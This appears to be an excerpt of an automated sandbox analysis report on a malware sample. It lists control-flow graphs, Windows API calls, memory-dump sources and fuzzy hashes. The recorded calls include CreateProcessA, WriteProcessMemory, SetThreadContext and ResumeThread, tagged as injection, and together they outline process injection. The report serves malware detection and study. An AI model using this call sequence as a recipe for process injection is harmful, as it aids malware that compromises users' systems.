                          control_flow_graph 731 4cb2d9e-4cb2e3d 733 4cb2e3f-4cb2e49 731->733 734 4cb2e76-4cb2e96 731->734 733->734 735 4cb2e4b-4cb2e4d 733->735 741 4cb2e98-4cb2ea2 734->741 742 4cb2ecf-4cb2efe 734->742 736 4cb2e4f-4cb2e59 735->736 737 4cb2e70-4cb2e73 735->737 739 4cb2e5b 736->739 740 4cb2e5d-4cb2e6c 736->740 737->734 739->740 740->740 743 4cb2e6e 740->743 741->742 744 4cb2ea4-4cb2ea6 741->744 748 4cb2f00-4cb2f0a 742->748 749 4cb2f37-4cb2ff1 CreateProcessA 742->749 743->737 746 4cb2ec9-4cb2ecc 744->746 747 4cb2ea8-4cb2eb2 744->747 746->742 750 4cb2eb6-4cb2ec5 747->750 751 4cb2eb4 747->751 748->749 753 4cb2f0c-4cb2f0e 748->753 762 4cb2ffa-4cb3080 749->762 763 4cb2ff3-4cb2ff9 749->763 750->750 752 4cb2ec7 750->752 751->750 752->746 754 4cb2f31-4cb2f34 753->754 755 4cb2f10-4cb2f1a 753->755 754->749 757 4cb2f1e-4cb2f2d 755->757 758 4cb2f1c 755->758 757->757 760 4cb2f2f 757->760 758->757 760->754 773 4cb3082-4cb3086 762->773 774 4cb3090-4cb3094 762->774 763->762 773->774 775 4cb3088 773->775 776 4cb3096-4cb309a 774->776 777 4cb30a4-4cb30a8 774->777 775->774 776->777 778 4cb309c 776->778 779 4cb30aa-4cb30ae 777->779 780 4cb30b8-4cb30bc 777->780 778->777 779->780 783 4cb30b0 779->783 781 4cb30ce-4cb30d5 780->781 782 4cb30be-4cb30c4 780->782 784 4cb30ec 781->784 785 4cb30d7-4cb30e6 781->785 782->781 783->780 787 4cb30ed 784->787 785->784 787->787
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04CB2FDE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: e8aa09ee75e50988a1df037b344187bcf6cadd2b9007089b5bd1279e27e58e73
                          • Instruction ID: c41851dbb01f13761d43989aead43e902756f42242e05ff310a5f8010530da98
                          • Opcode Fuzzy Hash: e8aa09ee75e50988a1df037b344187bcf6cadd2b9007089b5bd1279e27e58e73
                          • Instruction Fuzzy Hash: 52915C71D00759DFEB10CFA9C8457EDBBB2BF48304F1485A9E848A7250DB74AA85CF91
                          Function 04CB2DA8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 788 4cb2da8-4cb2e3d 790 4cb2e3f-4cb2e49 788->790 791 4cb2e76-4cb2e96 788->791 790->791 792 4cb2e4b-4cb2e4d 790->792 798 4cb2e98-4cb2ea2 791->798 799 4cb2ecf-4cb2efe 791->799 793 4cb2e4f-4cb2e59 792->793 794 4cb2e70-4cb2e73 792->794 796 4cb2e5b 793->796 797 4cb2e5d-4cb2e6c 793->797 794->791 796->797 797->797 800 4cb2e6e 797->800 798->799 801 4cb2ea4-4cb2ea6 798->801 805 4cb2f00-4cb2f0a 799->805 806 4cb2f37-4cb2ff1 CreateProcessA 799->806 800->794 803 4cb2ec9-4cb2ecc 801->803 804 4cb2ea8-4cb2eb2 801->804 803->799 807 4cb2eb6-4cb2ec5 804->807 808 4cb2eb4 804->808 805->806 810 4cb2f0c-4cb2f0e 805->810 819 4cb2ffa-4cb3080 806->819 820 4cb2ff3-4cb2ff9 806->820 807->807 809 4cb2ec7 807->809 808->807 809->803 811 4cb2f31-4cb2f34 810->811 812 4cb2f10-4cb2f1a 810->812 811->806 814 4cb2f1e-4cb2f2d 812->814 815 4cb2f1c 812->815 814->814 817 4cb2f2f 814->817 815->814 817->811 830 4cb3082-4cb3086 819->830 831 4cb3090-4cb3094 819->831 820->819 830->831 832 4cb3088 830->832 833 4cb3096-4cb309a 831->833 834 4cb30a4-4cb30a8 831->834 832->831 833->834 835 4cb309c 833->835 836 4cb30aa-4cb30ae 834->836 837 4cb30b8-4cb30bc 834->837 835->834 836->837 840 4cb30b0 836->840 838 4cb30ce-4cb30d5 837->838 839 4cb30be-4cb30c4 837->839 841 4cb30ec 838->841 842 4cb30d7-4cb30e6 838->842 839->838 840->837 844 4cb30ed 841->844 842->841 844->844
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04CB2FDE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: a8374a58aa48756bbfdd62dbe23c589db5dcdec7d5653394baf3febd6a77f089
                          • Instruction ID: 03c4aaefeb7583849826e35aa44fa7fa9b1113c8ad0f958dfc775da59c2807ef
                          • Opcode Fuzzy Hash: a8374a58aa48756bbfdd62dbe23c589db5dcdec7d5653394baf3febd6a77f089
                          • Instruction Fuzzy Hash: F2916B71D00759DFEB10CF69C844BEEBBB2BF48314F1485A9E848A7250DB74AA85CF91
                          Function 02A3B188 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 845 2a3b188-2a3b197 846 2a3b1c3-2a3b1c7 845->846 847 2a3b199-2a3b1a6 call 2a3ab2c 845->847 849 2a3b1db-2a3b21c 846->849 850 2a3b1c9-2a3b1d3 846->850 854 2a3b1a8 847->854 855 2a3b1bc 847->855 856 2a3b229-2a3b237 849->856 857 2a3b21e-2a3b226 849->857 850->849 900 2a3b1ae call 2a3b411 854->900 901 2a3b1ae call 2a3b420 854->901 855->846 858 2a3b25b-2a3b25d 856->858 859 2a3b239-2a3b23e 856->859 857->856 864 2a3b260-2a3b267 858->864 861 2a3b240-2a3b247 call 2a3ab38 859->861 862 2a3b249 859->862 860 2a3b1b4-2a3b1b6 860->855 863 2a3b2f8-2a3b3b8 860->863 866 2a3b24b-2a3b259 861->866 862->866 895 2a3b3c0-2a3b3eb GetModuleHandleW 863->895 896 2a3b3ba-2a3b3bd 863->896 867 2a3b274-2a3b27b 864->867 868 2a3b269-2a3b271 864->868 866->864 869 2a3b288-2a3b291 call 2a3ab48 867->869 870 2a3b27d-2a3b285 867->870 868->867 876 2a3b293-2a3b29b 869->876 877 2a3b29e-2a3b2a3 869->877 870->869 876->877 878 2a3b2c1-2a3b2c5 877->878 879 2a3b2a5-2a3b2ac 877->879 884 2a3b2cb-2a3b2ce 878->884 879->878 881 2a3b2ae-2a3b2be call 2a3ab58 call 2a3ab68 879->881 881->878 885 2a3b2f1-2a3b2f7 884->885 886 2a3b2d0-2a3b2ee 884->886 886->885 897 2a3b3f4-2a3b408 895->897 898 2a3b3ed-2a3b3f3 895->898 896->895 898->897 900->860 901->860
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02A3B3DE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 5df9a89aef394a1b53ed8775f2bbb645a2e2ca97f110cff9082ce8deb781be86
                          • Instruction ID: b501cc3d0c3bd1c80c02c12c2dea48d5825b2baa91e3e150a2e47bdc4e3760e9
                          • Opcode Fuzzy Hash: 5df9a89aef394a1b53ed8775f2bbb645a2e2ca97f110cff9082ce8deb781be86
                          • Instruction Fuzzy Hash: C8713770A00B058FD725DF69D58575ABBF2FF88308F008A2DE49AD7A40DB74E945CBA1
                          Function 051E12A4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 902 51e12a4-51e42fc 905 51e43ac-51e43cc call 51e117c 902->905 906 51e4302-51e4307 902->906 913 51e43cf-51e43dc 905->913 908 51e435a-51e4392 CallWindowProcW 906->908 909 51e4309-51e4340 906->909 911 51e439b-51e43aa 908->911 912 51e4394-51e439a 908->912 915 51e4349-51e4358 909->915 916 51e4342-51e4348 909->916 911->913 912->911 915->913 916->915
                          APIs
                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 051E4381
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499212059.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_51e0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: CallProcWindow
                          • String ID:
                          • API String ID: 2714655100-0
                          • Opcode ID: cdfc7375e351812f1f7f8953af22c52b737f4cd3eb5f209f7477444d663a33dd
                          • Instruction ID: 67cc37f7b99ee17a51815be1f2090365116d4f73cc97e3cd5fbdae67c554fc00
                          • Opcode Fuzzy Hash: cdfc7375e351812f1f7f8953af22c52b737f4cd3eb5f209f7477444d663a33dd
                          • Instruction Fuzzy Hash: 88413AB8900709CFDB14CF99C448FAABBF6FF88314F258459D519AB361D374A841CBA0
                          Function 02A347F4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 919 2a347f4-2a35d69 CreateActCtxA 922 2a35d72-2a35dcc 919->922 923 2a35d6b-2a35d71 919->923 930 2a35ddb-2a35ddf 922->930 931 2a35dce-2a35dd1 922->931 923->922 932 2a35de1-2a35ded 930->932 933 2a35df0 930->933 931->930 932->933 935 2a35df1 933->935 935->935
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 02A35D59
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: ea33203032c02db4353ca488021aca3044fa25e14a235b2163f155e8d1619aff
                          • Instruction ID: 7143487d9d1d8c530e6b6b0c518d2cd149613e71069f3e452cc16b8c8ad06520
                          • Opcode Fuzzy Hash: ea33203032c02db4353ca488021aca3044fa25e14a235b2163f155e8d1619aff
                          • Instruction Fuzzy Hash: 9C41C170C00719CFEB25CFA9C988BDEBBB6BF49704F60806AD409AB251DB756945CF90
                          Function 02A35C9D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 936 2a35c9d-2a35ca3 937 2a35ca8-2a35d69 CreateActCtxA 936->937 939 2a35d72-2a35dcc 937->939 940 2a35d6b-2a35d71 937->940 947 2a35ddb-2a35ddf 939->947 948 2a35dce-2a35dd1 939->948 940->939 949 2a35de1-2a35ded 947->949 950 2a35df0 947->950 948->947 949->950 952 2a35df1 950->952 952->952
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 02A35D59
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: c6fa34485ab7dbbc8251cc0a74ec1c59965e72ce7152b0fef42ac9420479e6b3
                          • Instruction ID: 90c07cffae63447e7ac89e1026bf8e4e6521a02e864e0dcbc04da2fd5a16b028
                          • Opcode Fuzzy Hash: c6fa34485ab7dbbc8251cc0a74ec1c59965e72ce7152b0fef42ac9420479e6b3
                          • Instruction Fuzzy Hash: B941B2B0C00719CFEB25CFA9C988BCEBBB6BF49704F60806AD409AB255DB756945CF50
                          Function 052DFC60 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 953 52dfc60-52dfcb4 955 52dfcbf-52dfcce 953->955 956 52dfcb6-52dfcbc 953->956 957 52dfcd0 955->957 958 52dfcd3-52dfd0c DrawTextExW 955->958 956->955 957->958 959 52dfd0e-52dfd14 958->959 960 52dfd15-52dfd32 958->960 959->960
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 052DFCFF
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499454065.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_52d0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 781ed9213e5d39f193964e9286d540754056c6b36f200710da45c935ad2191c4
                          • Instruction ID: b996e8f408a4a1da1e5b2a2d040be92bfa35a26c389121f238ca2302ee5ccad9
                          • Opcode Fuzzy Hash: 781ed9213e5d39f193964e9286d540754056c6b36f200710da45c935ad2191c4
                          • Instruction Fuzzy Hash: 6431E4B591024A9FDB10CF9AD984ADEFBF4FF48314F14842AE819A7310D775A540CFA4
                          Function 052DFC68 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 052DFCFF
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499454065.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_52d0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 491a65a73dc1246aca82ec3af91b7c8528174eefea4e89c73d0e3a40f507b467
                          • Instruction ID: 1d02ea9e86d95d1e9eecd391152a34032772648ef953d9b2e2023ffae1a73ffa
                          • Opcode Fuzzy Hash: 491a65a73dc1246aca82ec3af91b7c8528174eefea4e89c73d0e3a40f507b467
                          • Instruction Fuzzy Hash: 6E21E0B5D1024A9FDB10CF9AD884ADEFBF4BF48320F14842AE819A7310D374A940CFA4
                          Function 04CB2B18 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04CB2BB0
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: dc7a5f9351f18a5cf64fed611b84bebce3c8a669b436881ba54460a0ba388521
                          • Instruction ID: 2e166d9ff3623d34328130a1b637bfa2fdea23a8897cdd0b267efb927789c1ae
                          • Opcode Fuzzy Hash: dc7a5f9351f18a5cf64fed611b84bebce3c8a669b436881ba54460a0ba388521
                          • Instruction Fuzzy Hash: 502127B69003499FDB10CFA9C885BEEBBF1FF48310F14842AE559A7250C7789945CFA4
                          Function 04CB2B20 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04CB2BB0
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: a89213e6b3b3211f086df1b65a27b38540e245ff5cb258e402da74110ac9202a
                          • Instruction ID: 4b52030dedbe5effa7a77fdce2d2dcaf0135746116597bf656541e87259c00c4
                          • Opcode Fuzzy Hash: a89213e6b3b3211f086df1b65a27b38540e245ff5cb258e402da74110ac9202a
                          • Instruction Fuzzy Hash: BF2139759003499FDB10CFA9C885BEEBBF5FF48310F14842AE959A7240C778A945CBA1
                          Function 02A3CFB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A3D62E,?,?,?,?,?), ref: 02A3D6EF
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 3f8cda7dd06a6a5fc6eedf691e936ea27d97b1594d0f8606f445b180a63ee58f
                          • Instruction ID: a539a82ea2a249a1373ad03f62e1bdf565acc3fcba97691be5509f5d6790c83a
                          • Opcode Fuzzy Hash: 3f8cda7dd06a6a5fc6eedf691e936ea27d97b1594d0f8606f445b180a63ee58f
                          • Instruction Fuzzy Hash: 6321E3B5900649DFDB10CFAAD584AEEBBF8FB48310F14845AE918A3350D378A954CFA4
                          Function 04CB2548 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04CB25CE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: c572c4137cafc4454649f12c11a4988919f925274044fce4a453b5d7beb2e29f
                          • Instruction ID: 7f1bef524e810640e455ef54f6eeb4b350bc7723f000e93f0c59422679d313cb
                          • Opcode Fuzzy Hash: c572c4137cafc4454649f12c11a4988919f925274044fce4a453b5d7beb2e29f
                          • Instruction Fuzzy Hash: 632137B69003098FDB10CFA9C4857EEBBF1AF48314F14842AD559A7240D778AA45CFA1
                          Function 04CB2550 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04CB25CE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: d1452875ab9681175d0955d6b8502c6fb6e19b8143a992f3f4b4cd62bae60aa4
                          • Instruction ID: 5869f0e721ee6c24ba875063fd46ef23c198b8e71f6a1086b8489321740e2eba
                          • Opcode Fuzzy Hash: d1452875ab9681175d0955d6b8502c6fb6e19b8143a992f3f4b4cd62bae60aa4
                          • Instruction Fuzzy Hash: 3C2127719003098FDB10DFAAC485BEEBBF5EF48314F14C42AD559A7240DB78AA45CFA1
                          Function 04CB2C08 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04CB2C90
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 59964742a75d776a4500d117c90a224874e4aa93daf0884d13e933b1231fe9fa
                          • Instruction ID: de4ba02a1d2e1207c708176171bbab3ce8b9316690dc45c68383def1e5ca4298
                          • Opcode Fuzzy Hash: 59964742a75d776a4500d117c90a224874e4aa93daf0884d13e933b1231fe9fa
                          • Instruction Fuzzy Hash: 8A2128B68003498FDB10CFA9D885BEEBBF5FF48310F54842AE559A7240C778A941CFA1
                          Function 04CB2C10 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04CB2C90
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 96aaaa2182a18e91be118418b4ee1da9ddf6027c79886877e76a45a53d035575
                          • Instruction ID: daf2a951bf677560e06f538adf22cc4e45240f71aa020254d09e63e2730b5986
                          • Opcode Fuzzy Hash: 96aaaa2182a18e91be118418b4ee1da9ddf6027c79886877e76a45a53d035575
                          • Instruction Fuzzy Hash: 4E2125B58003499FDB10CFAAC885BEEBBF5FF48310F54842AE559A7240D779A940CBA1
                          Function 02A3D661 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A3D62E,?,?,?,?,?), ref: 02A3D6EF
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 21089730ae1667353d38d12dc0c3aa85bcbb449a92d734febaabd02058a2a3f8
                          • Instruction ID: ac09c43efe89e6f856fd6922d95414ef0b7d41e1da103d906841a58f95f046bd
                          • Opcode Fuzzy Hash: 21089730ae1667353d38d12dc0c3aa85bcbb449a92d734febaabd02058a2a3f8
                          • Instruction Fuzzy Hash: 0921E2B5900249DFDB10CFAAD584BEEBBF5FB48314F14846AE918A3350D378A954CF60
                          Function 04CA2739 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04CA27B3
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498362413.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4ca0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: c86a720603924e5ae0888c2954763854e61d0dfeb30f0236c9ed822cf65dc3b5
                          • Instruction ID: 2b1906131397a4fd35ede0757725184d88d6303e21d9666713de9052990349a6
                          • Opcode Fuzzy Hash: c86a720603924e5ae0888c2954763854e61d0dfeb30f0236c9ed822cf65dc3b5
                          • Instruction Fuzzy Hash: 242127B59002499FDB10CFAAC584BDEBBF4BF48310F14846AE458A7250D378A644CFA1
                          Function 04CA2740 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04CA27B3
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498362413.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4ca0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 9a334af522cada9406fba57339ce840127bbcb31553a3dd7c34c42fb54327165
                          • Instruction ID: 16a828e986d9316795a9d312a2665cbe3f73d5d208cfea9cd807dbac8ca97913
                          • Opcode Fuzzy Hash: 9a334af522cada9406fba57339ce840127bbcb31553a3dd7c34c42fb54327165
                          • Instruction Fuzzy Hash: C921D3B59002499FDB10CF9AC584BDEFBF4FB48324F10842AE958A7750D378A644CFA1
                          Function 02A3AB90 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A3B459,00000800,00000000,00000000), ref: 02A3B66A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: fd4a6740f9f6f19f4625098ef7479fdcd74dcde8666f0f2ec6c0ecee2bba2ca8
                          • Instruction ID: 1bc809023570de6589bcced309ef9da78b6e7e89a28ab01c7a9413347f1f427f
                          • Opcode Fuzzy Hash: fd4a6740f9f6f19f4625098ef7479fdcd74dcde8666f0f2ec6c0ecee2bba2ca8
                          • Instruction Fuzzy Hash: 6A1123B69047498FDB10CF9AD484BDEFBF5EB48314F10882EE519A7600C779A945CFA4
                          Function 02A3B5F9 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A3B459,00000800,00000000,00000000), ref: 02A3B66A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 4a1e11108705ae1530b4bd2c2e161843f2b70321da906ff9e52a8173a498904e
                          • Instruction ID: 69316b5b09715091140ffc6a39d938485c361d550664a1ec956cafbd79236ff3
                          • Opcode Fuzzy Hash: 4a1e11108705ae1530b4bd2c2e161843f2b70321da906ff9e52a8173a498904e
                          • Instruction Fuzzy Hash: 491120B6C003098FDB11CFAAD984BDEFBF5AB48314F14882AE419A7600C778A545CFA4
                          Function 04CB2498 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 74627518e46d0bb25d117a3c6d157f89f3147952247b618531f42d6a433d41ec
                          • Instruction ID: 9e3c4aa73fa43c5a816e8266e81afd4ae18dc09cf56f0b9844889e0ab1d24f4b
                          • Opcode Fuzzy Hash: 74627518e46d0bb25d117a3c6d157f89f3147952247b618531f42d6a433d41ec
                          • Instruction Fuzzy Hash: 72116AB58003498FDB10DFAAD4457EEFBF5AF48220F24881AC169A7280C779A644CFA0
                          Function 04CB24A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: c776d554def589cbbe1f1f9e03bebe2e9701b09d2e011f2719ceb7f7ac32ea98
                          • Instruction ID: 018443aeede120bf4af40f384522a5ed1f8762b7d209e70636d890408f49201d
                          • Opcode Fuzzy Hash: c776d554def589cbbe1f1f9e03bebe2e9701b09d2e011f2719ceb7f7ac32ea98
                          • Instruction Fuzzy Hash: D4113AB19003498FDB10DFAAC4497EFFBF5EF48214F148419D559A7640C779A544CFA1
                          Function 02A3B378 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02A3B3DE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491610266.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_2a30000_joUXSCpr.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: f94326df43d253b68a54bf8b59be278c2debcdf4d6054f2cd0e31a828c2a1d49
